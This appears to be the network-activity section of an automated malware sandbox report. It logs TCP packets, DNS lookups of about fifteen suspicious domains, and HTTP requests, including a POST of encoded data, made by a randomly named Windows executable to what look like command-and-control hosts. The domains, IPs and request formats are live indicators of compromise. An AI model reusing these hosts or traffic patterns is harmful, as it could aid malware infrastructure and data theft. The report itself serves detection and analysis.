                                                                                                      Oct 22, 2024 09:07:31.446336031 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:31.451668024 CEST80500513.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:36.494031906 CEST5005280192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:36.499346018 CEST8050052178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:36.499654055 CEST5005280192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:36.510354042 CEST5005280192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:36.515719891 CEST8050052178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:37.305147886 CEST8050052178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:37.350389004 CEST5005280192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:37.411520958 CEST8050052178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:37.411602020 CEST5005280192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:38.025989056 CEST5005280192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:39.042162895 CEST5005380192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:39.047504902 CEST8050053178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:39.047595024 CEST5005380192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:39.057894945 CEST5005380192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:39.063263893 CEST8050053178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:39.860501051 CEST8050053178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:39.913569927 CEST5005380192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:39.966908932 CEST8050053178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:39.967005968 CEST5005380192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:40.570979118 CEST5005380192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:41.593650103 CEST5005480192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:41.599045992 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.599772930 CEST5005480192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:41.613723993 CEST5005480192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:41.619270086 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619286060 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619307995 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619333982 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619349003 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619518995 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619530916 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619580030 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:41.619591951 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:42.424339056 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:42.532397032 CEST8050054178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:42.532922029 CEST5005480192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:43.116360903 CEST5005480192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:44.135379076 CEST5005580192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:44.141014099 CEST8050055178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:44.141179085 CEST5005580192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:44.148391962 CEST5005580192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:44.153825045 CEST8050055178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:44.959856033 CEST8050055178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:45.006622076 CEST5005580192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:45.067836046 CEST8050055178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:45.067955017 CEST5005580192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:45.069091082 CEST5005580192.168.2.4178.79.184.196
                                                                                                      Oct 22, 2024 09:07:45.074843884 CEST8050055178.79.184.196192.168.2.4
                                                                                                      Oct 22, 2024 09:07:50.143738985 CEST5005680192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:50.149281025 CEST805005684.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:50.149444103 CEST5005680192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:50.165730953 CEST5005680192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:50.171257019 CEST805005684.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:50.972831964 CEST805005684.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:50.972903013 CEST5005680192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:51.678848982 CEST5005680192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:51.684252977 CEST805005684.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:52.698590994 CEST5005780192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:52.704164982 CEST805005784.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:52.704245090 CEST5005780192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:52.717902899 CEST5005780192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:52.724090099 CEST805005784.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:53.519155025 CEST805005784.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:53.519372940 CEST5005780192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:54.225562096 CEST5005780192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:54.231278896 CEST805005784.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.246850014 CEST5005880192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:55.346332073 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.346429110 CEST5005880192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:55.364455938 CEST5005880192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:55.369951963 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.369968891 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.369988918 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.369998932 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.370007992 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.370141983 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.370176077 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.370186090 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:55.370198011 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:56.160017014 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:56.160913944 CEST5005880192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:56.881721020 CEST5005880192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:56.887073040 CEST805005884.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:57.899940014 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:57.905374050 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:57.905467987 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:57.912074089 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:57.917418957 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721070051 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721095085 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721108913 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721121073 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721132994 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721146107 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721152067 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721163988 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721174002 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721188068 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.721215963 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:58.721251965 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:58.726604939 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.772300005 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:58.831701994 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:07:58.831816912 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:58.833400965 CEST5005980192.168.2.484.32.84.32
                                                                                                      Oct 22, 2024 09:07:58.838700056 CEST805005984.32.84.32192.168.2.4
                                                                                                      Oct 22, 2024 09:08:03.855376005 CEST5006080192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:03.860907078 CEST8050060188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:03.861793041 CEST5006080192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:03.872876883 CEST5006080192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:03.878307104 CEST8050060188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:04.948767900 CEST8050060188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:04.948822021 CEST8050060188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:04.948852062 CEST8050060188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:04.948879004 CEST5006080192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:04.948966026 CEST5006080192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:05.381764889 CEST5006080192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:06.400650978 CEST5006180192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:06.407164097 CEST8050061188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:06.408061028 CEST5006180192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:06.419856071 CEST5006180192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:06.426054955 CEST8050061188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:07.286417961 CEST8050061188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:07.287946939 CEST8050061188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:07.287997961 CEST5006180192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:07.932729959 CEST5006180192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:09.557893991 CEST5006280192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:09.563431025 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.563554049 CEST5006280192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:09.578994036 CEST5006280192.168.2.4188.114.96.3
                                                                                                      Oct 22, 2024 09:08:09.584456921 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584469080 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584506989 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584515095 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584553957 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584563017 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584582090 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584589958 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:09.584600925 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:10.448340893 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:10.450499058 CEST8050062188.114.96.3192.168.2.4
                                                                                                      Oct 22, 2024 09:08:10.453722954 CEST5006280192.168.2.4188.114.96.3
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 22, 2024 09:04:43.050584078 CEST5366153192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:04:43.075972080 CEST53536611.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:04:58.775652885 CEST6354953192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:04:59.007016897 CEST53635491.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:05:12.353934050 CEST5996953192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:05:12.366584063 CEST53599691.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:05:26.214308023 CEST5701253192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:05:26.367358923 CEST53570121.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:05:39.776159048 CEST4935353192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:05:39.795902014 CEST53493531.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:05:53.213723898 CEST5691853192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:05:53.349303961 CEST53569181.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:06:07.353667974 CEST6235053192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:06:07.367819071 CEST53623501.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:06:27.760699034 CEST4945053192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:06:27.773478031 CEST53494501.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.073947906 CEST6456453192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:06:41.150461912 CEST53645641.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:06:54.447629929 CEST6550153192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:06:54.467320919 CEST53655011.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:07:08.057609081 CEST6389153192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:07:08.734613895 CEST53638911.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.217822075 CEST5140453192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:07:22.252428055 CEST53514041.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:07:36.469995022 CEST5410953192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:07:36.491410971 CEST53541091.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:07:50.090954065 CEST5462553192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:07:50.139437914 CEST53546251.1.1.1192.168.2.4
                                                                                                      Oct 22, 2024 09:08:03.837953091 CEST5702753192.168.2.41.1.1.1
                                                                                                      Oct 22, 2024 09:08:03.851273060 CEST53570271.1.1.1192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 22, 2024 09:04:43.050584078 CEST192.168.2.41.1.1.10x9e78Standard query (0)www.ladylawher.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:04:58.775652885 CEST192.168.2.41.1.1.10x3d20Standard query (0)www.meanttobebroken.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:12.353934050 CEST192.168.2.41.1.1.10xb540Standard query (0)www.jexiz.shopA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:26.214308023 CEST192.168.2.41.1.1.10x7775Standard query (0)www.prediksipreman.fyiA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:39.776159048 CEST192.168.2.41.1.1.10x803eStandard query (0)www.givora.siteA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:53.213723898 CEST192.168.2.41.1.1.10x394bStandard query (0)www.2925588.comA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:07.353667974 CEST192.168.2.41.1.1.10x5545Standard query (0)www.wrl-llc.netA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:27.760699034 CEST192.168.2.41.1.1.10xa557Standard query (0)www.7fh27o.vipA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:41.073947906 CEST192.168.2.41.1.1.10xb960Standard query (0)www.rebel.tiendaA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:54.447629929 CEST192.168.2.41.1.1.10xff2bStandard query (0)www.ila.beautyA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:08.057609081 CEST192.168.2.41.1.1.10xc9f6Standard query (0)www.college-help.infoA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:22.217822075 CEST192.168.2.41.1.1.10xdd17Standard query (0)www.owinvip.netA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:36.469995022 CEST192.168.2.41.1.1.10x5823Standard query (0)www.gucciqueen.shopA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:50.090954065 CEST192.168.2.41.1.1.10x571eStandard query (0)www.xtelify.techA (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:08:03.837953091 CEST192.168.2.41.1.1.10x25f2Standard query (0)www.timizoasisey.shopA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 22, 2024 09:04:43.075972080 CEST1.1.1.1192.168.2.40x9e78No error (0)www.ladylawher.orgladylawher.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:04:43.075972080 CEST1.1.1.1192.168.2.40x9e78No error (0)ladylawher.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:04:43.075972080 CEST1.1.1.1192.168.2.40x9e78No error (0)ladylawher.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:04:59.007016897 CEST1.1.1.1192.168.2.40x3d20No error (0)www.meanttobebroken.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:04:59.007016897 CEST1.1.1.1192.168.2.40x3d20No error (0)www.meanttobebroken.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:12.366584063 CEST1.1.1.1192.168.2.40xb540No error (0)www.jexiz.shopjexiz.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:12.366584063 CEST1.1.1.1192.168.2.40xb540No error (0)jexiz.shop8.210.3.99A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:26.367358923 CEST1.1.1.1192.168.2.40x7775No error (0)www.prediksipreman.fyiprediksipreman.fyiCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:26.367358923 CEST1.1.1.1192.168.2.40x7775No error (0)prediksipreman.fyi162.0.215.244A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:39.795902014 CEST1.1.1.1192.168.2.40x803eNo error (0)www.givora.site162.0.231.203A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:05:53.349303961 CEST1.1.1.1192.168.2.40x394bNo error (0)www.2925588.com103.71.154.12A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:07.367819071 CEST1.1.1.1192.168.2.40x5545No error (0)www.wrl-llc.netwrl-llc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:07.367819071 CEST1.1.1.1192.168.2.40x5545No error (0)wrl-llc.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:07.367819071 CEST1.1.1.1192.168.2.40x5545No error (0)wrl-llc.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:27.773478031 CEST1.1.1.1192.168.2.40xa557No error (0)www.7fh27o.vip7fh27o.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:27.773478031 CEST1.1.1.1192.168.2.40xa557No error (0)7fh27o.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:27.773478031 CEST1.1.1.1192.168.2.40xa557No error (0)7fh27o.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:41.150461912 CEST1.1.1.1192.168.2.40xb960No error (0)www.rebel.tienda199.59.243.227A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:54.467320919 CEST1.1.1.1192.168.2.40xff2bNo error (0)www.ila.beauty13.248.169.48A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:06:54.467320919 CEST1.1.1.1192.168.2.40xff2bNo error (0)www.ila.beauty76.223.54.146A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:08.734613895 CEST1.1.1.1192.168.2.40xc9f6No error (0)www.college-help.info38.88.82.56A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:22.252428055 CEST1.1.1.1192.168.2.40xdd17No error (0)www.owinvip.netowinvip.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:22.252428055 CEST1.1.1.1192.168.2.40xdd17No error (0)owinvip.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:22.252428055 CEST1.1.1.1192.168.2.40xdd17No error (0)owinvip.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:36.491410971 CEST1.1.1.1192.168.2.40x5823No error (0)www.gucciqueen.shopgucciqueen.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:36.491410971 CEST1.1.1.1192.168.2.40x5823No error (0)gucciqueen.shop178.79.184.196A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:50.139437914 CEST1.1.1.1192.168.2.40x571eNo error (0)www.xtelify.techxtelify.techCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:07:50.139437914 CEST1.1.1.1192.168.2.40x571eNo error (0)xtelify.tech84.32.84.32A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:08:03.851273060 CEST1.1.1.1192.168.2.40x25f2No error (0)www.timizoasisey.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Oct 22, 2024 09:08:03.851273060 CEST1.1.1.1192.168.2.40x25f2No error (0)www.timizoasisey.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      • www.ladylawher.org
                                                                                                      • www.meanttobebroken.org
                                                                                                      • www.jexiz.shop
                                                                                                      • www.prediksipreman.fyi
                                                                                                      • www.givora.site
                                                                                                      • www.2925588.com
                                                                                                      • www.wrl-llc.net
                                                                                                      • www.7fh27o.vip
                                                                                                      • www.rebel.tienda
                                                                                                      • www.ila.beauty
                                                                                                      • www.college-help.info
                                                                                                      • www.owinvip.net
                                                                                                      • www.gucciqueen.shop
                                                                                                      • www.xtelify.tech
                                                                                                      • www.timizoasisey.shop
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.4497413.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:04:43.096508980 CEST452OUTGET /up8i/?qp=qTZ8t28&_XPD90E=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.ladylawher.org
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:04:43.729077101 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:04:43 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 70 3d 71 54 5a 38 74 32 38 26 5f 58 50 44 39 30 45 3d 46 6f 6e 51 41 74 35 47 36 47 30 68 35 61 2f 78 63 57 33 34 70 66 76 37 63 78 63 72 6d 73 33 52 66 47 35 6e 78 50 46 67 55 73 31 63 73 6e 68 73 2b 6c 42 58 65 77 78 74 38 39 43 6a 35 56 6f 69 78 75 37 6a 4c 56 78 57 42 32 68 48 73 4e 50 6d 6e 70 51 64 73 52 31 6e 6d 71 46 56 37 4d 7a 75 77 77 56 6b 53 46 79 63 48 71 74 52 65 49 55 7a 44 52 71 6f 62 6c 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qp=qTZ8t28&_XPD90E=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4="}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449742141.193.213.10805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:04:59.025485992 CEST736OUTPOST /9g6s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      Origin: http://www.meanttobebroken.org
                                                                                                      Referer: http://www.meanttobebroken.org/9g6s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 38 78 61 56 58 70 54 4d 32 43 77 6b 59 4c 68 72 58 76 6f 55 4f 45 7a 71 65 42 4c 34 4e 36 4f 68 36 67 4c 65 6b 77 71 61 46 4b 41 66 59 67 70 36 38 47 72 75 39 64 73 63 7a 79 58 4f 55 36 35 70 6c 6a 55 69 76 67 4b 4d 6f 34 73 51 6f 39 2f 4d 39 32 36 5a 73 42 71 32 4a 78 67 65 50 43 6e 49 4b 43 71 63 44 4e 35 6b 70 4e 6d 6a 4b 37 30 63 48 4c 46 63 32 61 65 72 2f 48 43 31 4d 4a 75 61 42 52 51 37 34 58 70 39 55 45 4f 68 37 4e 59 37 4e 36 57 62 30 66 73 75 76 48 72 6a 52 46 36 57 31 50 77 64 73 4e 38 50 59 37 38 51 43 46 63 49 73 73 2b 70 51 3d 3d
